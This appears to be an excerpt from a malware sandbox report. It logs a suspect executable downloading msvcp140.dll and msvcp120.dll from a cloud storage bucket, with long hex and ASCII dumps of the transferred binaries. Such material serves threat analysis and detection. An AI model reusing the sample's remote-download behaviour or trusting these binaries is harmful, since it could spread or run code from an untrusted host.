                                                            2024-07-25 15:09:44 UTC8184INData Raw: 09 c6 46 04 03 eb 03 83 26 00 8b c6 5e 5d c2 04 00 55 8b ec 8b 55 0c 83 fa 09 77 20 83 39 ff 74 17 3b 11 7f 13 8b 54 91 04 8b 45 08 8b 0a 89 08 8b 4a 04 89 48 04 eb 11 6a 02 eb 02 6a 03 8b 4d 08 e8 70 fd ff ff 8b 45 08 5d c2 08 00 55 8b ec 51 51 ff 75 0c 8d 4d f8 e8 e9 fc ff ff ff 75 10 8b c8 ff 75 08 e8 74 00 00 00 8b 45 08 c9 c3 55 8b ec 51 51 ff 75 0c 83 65 f8 00 8d 4d f8 83 65 fc 00 e8 42 10 00 00 ff 75 10 8d 4d f8 ff 75 08 e8 49 00 00 00 8b 45 08 c9 c3 55 8b ec 51 51 ff 75 0c 8d 4d f8 e8 0c fd ff ff ff 75 10 8b c8 ff 75 08 e8 27 00 00 00 8b 45 08 c9 c3 55 8b ec 8b 11 56 8b 75 08 ff 75 0c 89 16 8b 49 04 89 4e 04 8b ce e8 6d 00 00 00 8b c6 5e 5d c2 08 00 55 8b ec 8b 11 56 8b 75 08 ff 75 0c 89 16 8b 49 04 89 4e 04 8b ce e8 a3 00 00 00 8b c6 5e 5d c2 08
                                                            Data Ascii: F&^]UUw 9t;TEJHjjMpE]UQQuMuutEUQQueMeBuMuIEUQQuMuu'EUVuuINm^]UVuuIN^]
                                                            2024-07-25 15:09:44 UTC8184INData Raw: 20 e8 cb f0 ff ff eb 30 6a 08 b9 1c 13 01 10 e8 1f 14 00 00 8b f0 85 f6 74 13 8b ce e8 cb de ff ff c7 06 44 22 00 10 c6 46 04 20 eb 02 33 f6 56 8d 4d dc e8 bd da ff ff 8d 45 c8 50 8d 45 d0 50 8d 4d dc e8 9e e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 4d b8 85 c9 74 2e 8b 45 bc 89 4d c0 8d 4d c0 6a 20 89 45 c4 e8 8e e1 ff ff 8d 45 f4 50 8d 45 d0 50 8d 4d c0 e8 69 e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 45 d8 a8 10 0f 84 f5 00 00 00 83 7d 18 00 0f 85 69 03 00 00 85 ff 0f 8e 89 00 00 00 8d 45 e8 c7 45 e8 fc 1d 00 10 50 8d 4d d0 c7 45 ec 02 00 00 00 e8 8f dc ff ff 8d 4d f4 51 8d 4d e8 51 8b c8 e8 18 e0 ff ff 8b 45 e8 89 45 f4 8b 45 ec 89 45 f8 a1 00 13 01 10 80 38 00 74 23 8d 45 d0 50 e8 08 24 00 00 59 8d 4d f4 51 8d 4d a8 51 8b c8 e8 e9 df ff ff 8b 08
                                                            Data Ascii: 0jtD"F 3VMEPEPMXM]Mt.EMMj EEPEPMiXM]E}iEEPMEMQMQEEEE8t#EP$YMQMQ
                                                            2024-07-25 15:09:44 UTC16368INData Raw: f8 89 55 f4 56 50 e8 07 dd ff ff 50 ff 75 08 e8 d8 d6 ff ff 83 c4 1c eb 93 6a 01 56 ff 75 08 8d 41 01 a3 00 13 01 10 e8 0b 01 00 00 e9 78 ff ff ff 56 ff 75 08 8d 41 01 a3 00 13 01 10 e8 01 ef ff ff e9 dd fe ff ff 8d 45 f0 8d 4d f8 50 39 16 74 10 c7 45 f0 4c 20 00 10 c7 45 f4 09 00 00 00 eb 0e c7 45 f0 58 20 00 10 c7 45 f4 08 00 00 00 e8 59 bf ff ff 8b 0d 00 13 01 10 6a 03 e9 df fe ff ff 83 e8 53 0f 84 9f 00 00 00 83 e8 01 74 4c 48 83 e8 01 74 29 83 e8 03 74 0f 8b 4d 08 6a 02 e8 21 bd ff ff e9 02 ff ff ff ff 75 08 8d 41 01 a3 00 13 01 10 e8 01 08 00 00 e9 66 fe ff ff 8b 55 0c 8d 41 01 a3 00 13 01 10 8b 45 08 8b 0a 89 08 8b 4a 04 89 48 04 e9 d3 fe ff ff 8d 41 01 a3 00 13 01 10 8b 45 0c 39 10 74 20 50 8d 45 f0 c7 45 f0 64 20 00 10 50 ff 75 08 c7 45 f4 0f 00
                                                            Data Ascii: UVPPujVuAxVuAEMP9tEL EEX EYjStLHt)tMj!uAfUAEJHAE9t PEEd PuE
                                                            2024-07-25 15:09:44 UTC8184INData Raw: 5f 69 6e 66 6f 40 40 00 ca 23 01 00 9a 25 01 00 86 25 01 00 68 25 01 00 4c 25 01 00 32 25 01 00 1c 25 01 00 06 25 01 00 ec 24 01 00 d0 24 01 00 bc 24 01 00 a6 24 01 00 94 24 01 00 82 24 01 00 74 24 01 00 6a 24 01 00 40 23 01 00 4c 23 01 00 5c 23 01 00 6c 23 01 00 88 23 01 00 a0 23 01 00 b2 23 01 00 4e 24 01 00 e2 23 01 00 fa 23 01 00 0a 24 01 00 1a 24 01 00 42 24 01 00 5c 24 01 00 00 00 00 00 88 22 01 00 00 00 00 00 3e 22 01 00 28 22 01 00 20 22 01 00 00 00 00 00 14 22 01 00 0c 22 01 00 00 00 00 00 52 22 01 00 6c 22 01 00 00 00 00 00 32 22 01 00 90 22 01 00 48 22 01 00 00 00 00 00 a0 3f 00 10 00 00 00 00 e4 21 01 00 00 00 00 00 00 00 00 00 9a 22 01 00 94 20 01 00 d4 21 01 00 00 00 00 00 00 00 00 00 bc 22 01 00 84 20 01 00 fc 21 01 00 00 00 00 00 00 00 00
                                                            Data Ascii: _info@@#%%h%L%2%%%$$$$$$t$j$@#L#\#l####N$##$$B$\$">"(" """R"l"2""H"?!" !" !
                                                            2024-07-25 15:09:45 UTC8184INData Raw: 49 0d ed 7e e0 17 6d 36 9c 91 55 dc 4b 4f 0c 63 4d ce 51 2e a0 55 53 26 4a ce 7f 0f 44 d8 1c d2 d0 1f 0f 06 3a 12 f3 53 98 99 fd 39 34 2c 23 f5 14 90 85 ce 32 51 4e 44 8d 5e 85 d2 33 7f 22 af 3c 54 7b 71 07 d0 5f ba 77 1c 4f 03 25 49 50 3a 41 db 59 a1 0f 04 24 1f 5e 06 a7 9b e9 ab b8 25 52 f3 83 af 5b 26 3d d9 37 18 cb a5 b7 e4 48 d0 c2 be ed 5f bf 36 4e e9 7b 36 55 7c 19 e1 32 22 11 ae 6c cb 0b b7 a9 71 47 5e 54 80 c8 ab 7e 05 ba 63 82 3c 52 97 40 1d 9c ea 77 02 03 01 00 01 a3 82 01 4b 30 82 01 47 30 10 06 09 2b 06 01 04 01 82 37 15 01 04 03 02 01 00 30 1d 06 03 55 1d 0e 04 16 04 14 77 92 04 78 27 b2 0b 49 07 75 97 ee e9 eb 5e 26 5c 09 44 75 30 19 06 09 2b 06 01 04 01 82 37 14 02 04 0c 1e 0a 00 53 00 75 00 62 00 43 00 41 30 0b 06 03 55 1d 0f 04 04 03 02
                                                            Data Ascii: I~m6UKOcMQ.US&JD:S94,#2QND^3"<T{q_wO%IP:AY$^%R[&=7H_6N{6U|2"lqG^T~c<R@wK0G0+70Uwx'Iu^&\Du0+7SubCA0U
                                                            2024-07-25 15:09:45 UTC9720INData Raw: 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a2 c8 b2 65 60 7b 0f 97 82 fd b0 97 ba c2 86 31 89 83 d2 34 db f4 12 22 e5 ac a6 7e 47 ce 3d 10 0e 7a ac a0 6a 7e 1d fd c7 3b 61 b6 34 46 84 a2 3d f8 a0 a7 71 6f d5 5f 68 27 36 bd 61 30 aa 51 d9 3d 79 4d f9 24 45 5a 06 92 eb 1c 34 11 c6 20 72 6f 39 bf de f0 c8 49 d5 09 8b 46 70 14 25 21 57 26 50 33 60 c3 41 17 bd dc 8a c7 01 3f 02 d4 8e dd ab 5d 47 31 0b 98 91 1c b3 0a 99 56 18 e7 f2 0b 85 8b a7 d8 06 ce 2e 69 83 bf 74 4b a2 2f d6 ab 35 69 72 1f ff d1 bb b5 91 98 96 5a 50 b4 07 04 5e f6 62 83 df b6 e3 c7 a8 90 57 c1 df 17 8c cd f3 5d 48 5f d7 55 f3 cf 9d 4f e5 2e 82 a8 5c 8e 19 49 29 2b 0d 0c 82 6c 84 8e d0
                                                            Data Ascii: osoft Corporation0"0*H0e`{14"~G=zj~;a4F=qo_h'6a0Q=yM$EZ4 ro9IFp%!W&P3`A?]G1V.itK/5irZP^bW]H_UO.\I)+l


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.54972082.156.94.484435780C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-25 15:09:47 UTC131OUTGET /msvcp140.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0
                                                            Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                            Cache-Control: no-cache
                                                            2024-07-25 15:09:47 UTC473INHTTP/1.1 200 OK
                                                            Content-Type: application/x-msdownload
                                                            Content-Length: 446840
                                                            Connection: close
                                                            Accept-Ranges: bytes
                                                            Content-Disposition: attachment
                                                            Date: Thu, 25 Jul 2024 15:09:47 GMT
                                                            ETag: "c766ca0482dfe588576074b9ed467e38"
                                                            Last-Modified: Wed, 20 Mar 2024 20:21:50 GMT
                                                            Server: tencent-cos
                                                            x-cos-force-download: true
                                                            x-cos-hash-crc64ecma: 10292142785671919093
                                                            x-cos-request-id: NjZhMjZhYmJfN2JjMDBiMDlfYWZhMl8xZGZlOGMx
                                                            x-cos-server-side-encryption: AES256
                                                            2024-07-25 15:09:47 UTC7731INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d 4f bd 24 c9 2e d3 77 c9 2e d3 77 c9 2e d3 77 1a 5c d2 76 cb 2e d3 77 c0 56 40 77 df 2e d3 77 cf af d2 76 ca 2e d3 77 c9 2e d2 77 08 2e d3 77 cf af d7 76 c2 2e d3 77 cf af d0 76 c0 2e d3 77 cf af d6 76 44 2e d3 77 cf af d3 76 c8 2e d3 77 cf af 2c 77 c8 2e d3 77 cf af d1 76 c8 2e d3 77 52 69 63 68 c9 2e d3 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$O$.w.w.w\v.wV@w.wv.w.w.wv.wv.wvD.wv.w,w.wv.wRich.w
                                                            2024-07-25 15:09:48 UTC8184INData Raw: 10 14 5c 00 10 f0 bc 00 10 40 e0 00 10 c0 df 00 10 70 ce 00 10 60 dc 00 10 90 dc 00 10 69 6f 73 74 72 65 61 6d 00 00 00 00 69 6f 73 74 72 65 61 6d 20 73 74 72 65 61 6d 20 65 72 72 6f 72 00 00 00 60 5c 00 10 40 bd 00 10 b0 96 00 10 62 61 64 20 63 61 73 74 00 00 00 00 ac 5c 00 10 a0 b9 00 10 00 ca 03 10 00 ca 03 10 62 61 64 20 6c 6f 63 61 6c 65 20 6e 61 6d 65 00 00 00 00 00 3a 53 75 6e 3a 53 75 6e 64 61 79 3a 4d 6f 6e 3a 4d 6f 6e 64 61 79 3a 54 75 65 3a 54 75 65 73 64 61 79 3a 57 65 64 3a 57 65 64 6e 65 73 64 61 79 3a 54 68 75 3a 54 68 75 72 73 64 61 79 3a 46 72 69 3a 46 72 69 64 61 79 3a 53 61 74 3a 53 61 74 75 72 64 61 79 00 00 00 3a 4a 61 6e 3a 4a 61 6e 75 61 72 79 3a 46 65 62 3a 46 65 62 72 75 61 72 79 3a 4d 61 72 3a 4d 61 72 63 68 3a 41 70 72 3a 41 70
                                                            Data Ascii: \@p`iostreamiostream stream error`\@bad cast\bad locale name:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday:Jan:January:Feb:February:Mar:March:Apr:Ap
                                                            2024-07-25 15:09:48 UTC16368INData Raw: 00 00 00 16 40 1c 70 00 10 b0 74 02 10 80 c6 00 10 80 be 00 10 f0 90 02 10 80 a2 02 10 d0 9d 02 10 70 70 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 f0 2e 02 10 30 91 02 10 80 c7 00 10 c8 70 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 00 92 02 10 50 91 02 10 1c 71 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 10 9e 02 10 50 9f 02 10 18 73 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00 02 10 00 2f 02 10 a0 2e 02 10 70 71 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00 02 10 00 2f 02 10 a0 2e 02 10 10 72 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00
                                                            Data Ascii: @ptpp .0p Pq Pst,P=6,`=/.pqt,P=6,`=/.rt,P=6,`=
                                                            2024-07-25 15:09:48 UTC8184INData Raw: 08 e8 2f 01 00 00 83 65 fc 00 c7 06 80 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7 01 44 29 00 10 89 41 08 c7 41 04 88 29 00 10 89 45 fc c7 01 80 29 00 10 83 4d fc ff 8b c1 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 43 cb 03 10 64 a1 00 00 00 00 50 51 56 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 ff 75 08 e8 7f 00 00 00 83 65 fc 00 c7 06 64 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7
                                                            Data Ascii: /e)MMdY^UjhmdPQ23PEdM3D)AA)E)MMdYUjhCdPQV23PEduued)MMdY^UjhmdPQ23PEdM3
                                                            2024-07-25 15:09:49 UTC8184INData Raw: 31 ce 03 10 e8 65 11 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 d8 2e 00 10 e8 42 02 00 00 8d 45 bc 8b ce 50 e8 a7 1d 00 00 8d 4d bc e8 7f 08 00 00 8b c6 e8 06 11 03 00 c2 04 00 cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 ff 75 08 8b f1 89 75 fc 89 46 04 c7 06 98 2e 00 10 e8 72 1d 00 00 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc 6a 38 b8 31 ce 03 10 e8 e5 10 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 98 2e 00 10 e8 c2 01 00 00 8d 45 bc 8b ce 50 e8 27 1d 00 00 8d 4d bc e8 ff 07 00 00 8b c6 e8 86 10 03 00 c2 04 00 cc cc cc cc cc 56 8b f1 56 e8 c7 5a 00 00 59 8b c6 5e c3 cc cc c7 01 90 2a 00 10 8b c1 c2 04 00 cc cc cc cc cc c7 01 90 2a 00 10 8b c1 c3 a1 18 46 06 10 c7 05 38 49
                                                            Data Ascii: 1euEFeMh`-.BEPMUQEVuuF.r^j81uEFeMh`-.EP'MVVZY^**F8I
                                                            2024-07-25 15:09:49 UTC8184INData Raw: 00 cc 55 8b ec 83 ec 0c 8d 4d f4 e8 00 e4 ff ff 68 48 09 04 10 8d 45 f4 50 e8 bb ff 02 00 cc cc cc cc cc cc cc 56 8b f1 8b 46 10 85 c0 7e 0b ff 76 0c ff 15 cc 61 06 10 eb 0a 79 09 ff 76 0c e8 69 f3 02 00 59 ff 76 14 ff 15 cc 61 06 10 59 5e c3 cc cc cc cc 55 8b ec 6a ff 68 a4 cf 03 10 64 a1 00 00 00 00 50 56 57 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f9 6a 00 e8 b3 f3 ff ff 8b 47 28 85 c0 74 12 8b 30 6a 10 50 e8 7c ed 02 00 8b c6 59 59 85 f6 75 ee 83 67 28 00 8b 47 2c 85 c0 74 12 8b 30 6a 0c 50 e8 5f ed 02 00 8b c6 59 59 85 f6 75 ee 83 67 2c 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e c9 c3 cc cc cc cc cc 56 8b f1 8b 46 14 83 f8 0f 76 0b 40 50 ff 36 e8 1e d6 ff ff 59 59 83 66 10 00 c7 46 14 0f 00 00 00 c6 06 00 5e c3 cc cc cc cc cc cc cc cc cc
                                                            Data Ascii: UMhHEPVF~vayviYvaY^UjhdPVW23PEdjG(t0jP|YYug(G,t0jP_YYug,MdY_^VFv@P6YYfF^
                                                            2024-07-25 15:09:49 UTC8184INData Raw: 56 57 ff 75 0c 8b f9 ff 75 08 8b 07 8b 70 24 8b ce ff 15 30 63 06 10 8b cf ff d6 5f 5e 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 6a 30 b8 6a d1 03 10 e8 78 d1 02 00 8b d9 8b 43 1c 8b 08 85 c9 74 23 8b 53 2c 8b 32 8d 04 0e 3b c8 73 17 8d 46 ff 89 02 8b 4b 1c 8b 11 8d 42 01 89 01 0f b6 02 e9 51 01 00 00 83 7b 4c 00 75 08 83 c8 ff e9 43 01 00 00 8b cb e8 11 df ff ff 8b 4b 4c 33 d2 39 53 38 75 19 51 8d 45 d6 50 e8 a6 b6 ff ff 59 59 84 c0 74 d7 0f b6 45 d6 e9 19 01 00 00 33 c0 8d 7d d8 ab ab ab ab 89 55 e8 c7 45 ec 0f 00 00 00 88 55 d8 51 89 55 fc ff 15 98 62 06 10 83 cf ff e9 90 00 00 00 50 8d 4d d8 e8 54 f8 ff ff 83 7d ec 0f 8d 4d d8 8b 53 38 89 55 c8 76 03 8b 4d d8 8b 45 e8 03 c1 83 7d ec 0f 89 45 cc 8d 4d d8 76 03 8b 4d d8 8b 02 8b 70 18 8d 45 c4 50
                                                            Data Ascii: VWuup$0c_^]j0jxCt#S,2;sFKBQ{LuCKL39S8uQEPYYtE3}UEUQUbPMT}MS8UvME}EMvMpEP
                                                            2024-07-25 15:09:49 UTC8184INData Raw: 0f 8d 75 c0 76 03 8b 75 c0 8a 06 3c 7f 74 32 8b 7d ac 84 c0 7e 28 0f be c8 8b c7 2b c3 3b c8 73 1d ff 75 98 2b f9 8d 4d d8 6a 01 57 e8 6e 34 00 00 80 7e 01 00 7e 01 46 8a 06 3c 7f 75 d4 8b 7d bc 83 7f 24 00 8b 45 e8 89 45 a0 7c 13 7f 06 83 7f 20 00 76 0b 8b 77 20 3b f0 76 04 2b f0 eb 02 33 f6 8b 47 14 25 c0 01 00 00 83 f8 40 0f 84 83 00 00 00 3d 00 01 00 00 74 38 56 ff 75 18 8d 45 a4 ff 75 10 ff 75 0c 50 ff 75 b8 e8 e5 20 00 00 83 c4 18 33 f6 83 7d ec 0f 8b 08 8b 50 04 8d 45 d8 89 4d 0c 89 55 10 76 03 8b 45 d8 53 50 52 51 eb 58 83 7d ec 0f 8d 45 d8 76 03 8b 45 d8 53 50 ff 75 10 8d 45 a4 ff 75 0c 50 ff 75 b8 e8 63 20 00 00 56 ff 75 18 8b 08 8b 40 04 50 89 45 10 8d 45 a4 51 50 ff 75 b8 89 4d 0c e8 86 20 00 00 83 c4 30 33 f6 eb 23 83 7d ec 0f 8d 45 d8 76 03
                                                            Data Ascii: uvu<t2}~(+;su+MjWn4~~F<u}$EE| vw ;v+3G%@=t8VuEuuPu 3}PEMUvESPRQX}EvESPuEuPuc Vu@PEEQPuM 03#}Ev
                                                            2024-07-25 15:09:50 UTC16384INData Raw: 33 c0 eb 07 53 e8 24 f4 ff ff 59 ff 75 f0 50 56 e8 98 fc ff ff 83 c4 0c b9 90 49 06 10 e8 bb 8b ff ff 85 db 75 4a 6a 18 89 45 f0 e8 65 93 02 00 8b f0 59 89 75 e8 c7 45 fc 07 00 00 00 85 f6 74 1a 21 5e 04 53 ff 75 08 8b ce c6 45 fc 08 c7 06 c8 32 00 10 e8 ba f8 ff ff eb 02 33 f6 ff 75 f0 83 4d fc ff 56 57 e8 42 fc ff ff 83 c4 0c eb 13 53 8b f0 e8 4b f4 ff ff 56 50 57 e8 2d fc ff ff 83 c4 10 83 7d ec 00 74 4a b9 c0 46 06 10 e8 4a 8b ff ff 8b f0 85 db 75 29 6a 08 e8 f5 92 02 00 89 45 e8 59 85 c0 74 0b 21 58 04 c7 00 1c 30 00 10 eb 02 33 c0 56 50 57 e8 f0 fb ff ff 83 c4 0c eb 11 53 e8 39 78 ff ff 56 50 57 e8 dd fb ff ff 83 c4 10 8b 75 08 53 57 ff 75 0c 56 e8 0c 5d 01 00 53 57 ff 75 0c 56 e8 b1 c2 00 00 53 8b 5d 0c 57 53 56 e8 c5 bd 00 00 09 5f 10 83 c4 30 8b
                                                            Data Ascii: 3S$YuPVIuJjEeYuEt!^SuE23uMVWBSKVPW-}tJFJu)jEYt!X03VPWS9xVPWuSWuV]SWuVS]WSV_0
                                                            2024-07-25 15:09:50 UTC8168INData Raw: 00 89 75 f0 e8 d4 4b ff ff 8b 4d 08 50 e8 4b 5b ff ff 8b f8 85 ff 75 43 85 f6 74 04 8b fe eb 3b ff 75 08 8d 45 f0 50 e8 f1 59 ff ff 59 59 83 f8 ff 74 38 8b 7d f0 89 7d f0 57 c6 45 fc 01 e8 73 d6 ff ff 8b 07 59 8b 70 04 8b ce ff 15 30 63 06 10 8b cf ff d6 89 3d 34 4f 06 10 8d 4d ec e8 6a 39 01 00 8b c7 e8 01 51 02 00 c3 e8 aa 5f ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 56 8b f1 89 75 fc e8 b1 44 ff ff 83 66 38 00 83 66 3c 00 33 c0 66 89 46 40 8b c6 c7 06 50 41 00 10 5e c9 c3 cc cc cc cc cc cc cc cc 6a 08 b8 c0 cd 03 10 e8 d5 50 02 00 8b f1 89 75 ec 83 65 f0 00 83 7d 10 00 74 19 8d 4e 08 c7 06 5c 41 00 10 e8 a7 ff ff ff 83 65 fc 00 c7 45 f0 01 00 00 00 8b 06 ff 75 0c ff 75 08 8b 40 04 c7 04 06 58 41 00 10 8b 06 8b 48 04 8d 41 f8 89 44 31 fc
                                                            Data Ascii: uKMPK[uCt;uEPYYYt8}}WEsYp0c=4OMj9Q_UQVuDf8f<3fF@PA^jPue}tN\AeEuu@XAHAD1


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.54972182.156.94.484435780C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-25 15:09:57 UTC131OUTGET /msvcp120.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0
                                                            Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                            Cache-Control: no-cache
                                                            2024-07-25 15:09:57 UTC476INHTTP/1.1 200 OK
                                                            Content-Type: application/x-msdownload
                                                            Content-Length: 455160
                                                            Connection: close
                                                            Accept-Ranges: bytes
                                                            Content-Disposition: attachment
                                                            Date: Thu, 25 Jul 2024 15:09:57 GMT
                                                            ETag: "50260b0f19aaa7e37c4082fecef8ff41"
                                                            Last-Modified: Wed, 20 Mar 2024 20:21:48 GMT
                                                            Server: tencent-cos
                                                            x-cos-force-download: true
                                                            x-cos-hash-crc64ecma: 9823542669508837271
                                                            x-cos-request-id: NjZhMjZhYzVfYTRhZTE0MGJfMTFkYWNfM2ZkMjM2MA==
                                                            x-cos-server-side-encryption: AES256
                                                            2024-07-25 15:09:57 UTC15908INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f ad d2 1d 2b cc bc 4e 2b cc bc 4e 2b cc bc 4e f6 33 77 4e 29 cc bc 4e 2b cc bd 4e f0 cc bc 4e 6d 9d 61 4e 28 cc bc 4e 6d 9d 63 4e 23 cc bc 4e 6d 9d 5d 4e 18 cc bc 4e 6d 9d 5c 4e 65 cc bc 4e 6d 9d 59 4e 2d cc bc 4e 6d 9d 60 4e 2a cc bc 4e 6d 9d 67 4e 2a cc bc 4e 6d 9d 62 4e 2a cc bc 4e 52 69 63 68 2b cc bc 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$o+N+N+N3wN)N+NNmaN(NmcN#Nm]NNm\NeNmYN-Nm`N*NmgN*NmbN*NRich+N
                                                            2024-07-25 15:09:57 UTC4INData Raw: 36 b6 76 f6
                                                            Data Ascii: 6v
                                                            2024-07-25 15:09:57 UTC8184INData Raw: 0e 8e 4e ce 2e ae 6e ee 1e 9e 5e de 3e be 7e fe 01 81 41 c1 21 a1 61 e1 11 91 51 d1 31 b1 71 f1 09 89 49 c9 29 a9 69 e9 19 99 59 d9 39 b9 79 f9 05 85 45 c5 25 a5 65 e5 15 95 55 d5 35 b5 75 f5 0d 8d 4d cd 2d ad 6d ed 1d 9d 5d dd 3d bd 7d fd 03 83 43 c3 23 a3 63 e3 13 93 53 d3 33 b3 73 f3 0b 8b 4b cb 2b ab 6b eb 1b 9b 5b db 3b bb 7b fb 07 87 47 c7 27 a7 67 e7 17 97 57 d7 37 b7 77 f7 0f 8f 4f cf 2f af 6f ef 1f 9f 5f df 3f bf 7f ff 84 7c 00 10 00 b2 03 10 00 b2 03 10 00 b2 03 10 a1 11 01 10 00 b2 03 10 00 b2 03 10 49 6e 64 65 78 20 6f 75 74 20 6f 66 20 72 61 6e 67 65 00 00 49 6e 64 65 78 20 6f 75 74 20 6f 66 20 73 65 67 6d 65 6e 74 73 20 74 61 62 6c 65 20 72 61 6e 67 65 00 00 00 49 6e 64 65 78 20 69 73 20 69 6e 73 69 64 65 20 73 65 67 6d 65 6e 74 20 77 68 69
                                                            Data Ascii: N.n^>~A!aQ1qI)iY9yE%eU5uM-m]=}C#cS3sK+k[;{G'gW7wO/o_?|Index out of rangeIndex out of segments table rangeIndex is inside segment whi
                                                            2024-07-25 15:09:57 UTC8184INData Raw: 84 69 00 10 00 00 00 00 00 00 00 00 01 00 00 00 94 6f 00 10 d0 50 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 69 00 10 b8 4d 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 20 6c 00 10 00 00 00 00 e0 00 00 00 00 00 00 00 78 4c 06 10 dc 6a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 51 06 10 9c 6e 00 10 70 71 00 10 d8 64 00 10 a0 75 00 10 00 00 00 00 78 5a 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 6c 00 10 58 49 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 a8 70 00 10 00 00 00 00 01 00 00 00 04 00 00 00 ac 71 00 10 30 48 06 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 00 6a 00 10 88 41 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00
                                                            Data Ascii: ioP@iM@ lxLjQnpqduxZ@lXI@pq0H@jA@
